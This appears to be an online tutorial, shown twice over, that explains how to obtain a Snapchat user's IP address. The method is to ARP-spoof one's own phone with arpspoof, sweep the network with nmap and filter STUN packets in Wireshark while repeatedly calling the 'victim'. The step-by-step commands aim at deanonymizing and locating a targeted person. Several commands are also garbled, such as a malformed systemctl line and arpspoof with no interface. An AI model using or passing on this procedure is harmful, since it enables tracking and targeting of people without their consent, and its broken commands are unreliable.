Here are some things you will need to make it work:
Requirements: - Mac OS X / Kali Linux (or any UNIX)
- A phone on which you have Snapchat
-Nmap
- A few tools and little MITM knowledge!
Here's how to proceed:
Download Wireshark -> https://www.wireshark.org
Download arpspoof for Mac -> https://github.com/ivanvza/arpy
1. Launch the terminal and transfer the IP address of your laptop/PC with these scripts:
On Kali:
Sudo systemctl net.ipv4.ip_forward = 1
Sudo net.ipv4.ip_forward = 1
On Mac:
Sudo sysctl -w net.inet.ip.forwarding=1
2. Find the local IP address of your phone device and write it down.
Nmap -sn (or -sP) <IP of the gateway>/24
Example:
Nmap -sn (or -sP) 192.168.0.1/24
3. Usurp your phone.
Arpspoof -i -t < Gateway IP>
Example:
Arpspoof -i en0 -t 192.168.0.160 <- (ip of your phone) 192.168.0.1 <- (ip of your gateway)
Sometimes you also have to reverse arpspoof, so to be sure, change gateway with the phone's IP address:
Arpspoof -i en0 -t 192.168.0.1 192.168.0.160
4. Launch Wireshark and filter your phone's IP address with the STUN protocol
Ip.addr == <IP of your phone> && stun
Example:
Ip.addr == 192.168.0.160 && stun
5. Call your victim instantly and keep calling them for about 5 seconds.
Wireshark should launch some liaison requests, then other STUNs.
These are the IP address of your victim.
Requirements: - Mac OS X / Kali Linux (or any UNIX)
- A phone on which you have Snapchat
-Nmap
- A few tools and little MITM knowledge!
Here's how to proceed:
Download Wireshark -> https://www.wireshark.org
Download arpspoof for Mac -> https://github.com/ivanvza/arpy
1. Launch the terminal and transfer the IP address of your laptop/PC with these scripts:
On Kali:
Sudo systemctl net.ipv4.ip_forward = 1
Sudo net.ipv4.ip_forward = 1
On Mac:
Sudo sysctl -w net.inet.ip.forwarding=1
2. Find the local IP address of your phone device and write it down.
Nmap -sn (or -sP) <IP of the gateway>/24
Example:
Nmap -sn (or -sP) 192.168.0.1/24
3. Usurp your phone.
Arpspoof -i -t < Gateway IP>
Example:
Arpspoof -i en0 -t 192.168.0.160 <- (ip of your phone) 192.168.0.1 <- (ip of your gateway)
Sometimes you also have to reverse arpspoof, so to be sure, change gateway with the phone's IP address:
Arpspoof -i en0 -t 192.168.0.1 192.168.0.160
4. Launch Wireshark and filter your phone's IP address with the STUN protocol
Ip.addr == <IP of your phone> && stun
Example:
Ip.addr == 192.168.0.160 && stun
5. Call your victim instantly and keep calling them for about 5 seconds.
Wireshark should launch some liaison requests, then other STUNs.
These are the IP address of your victim.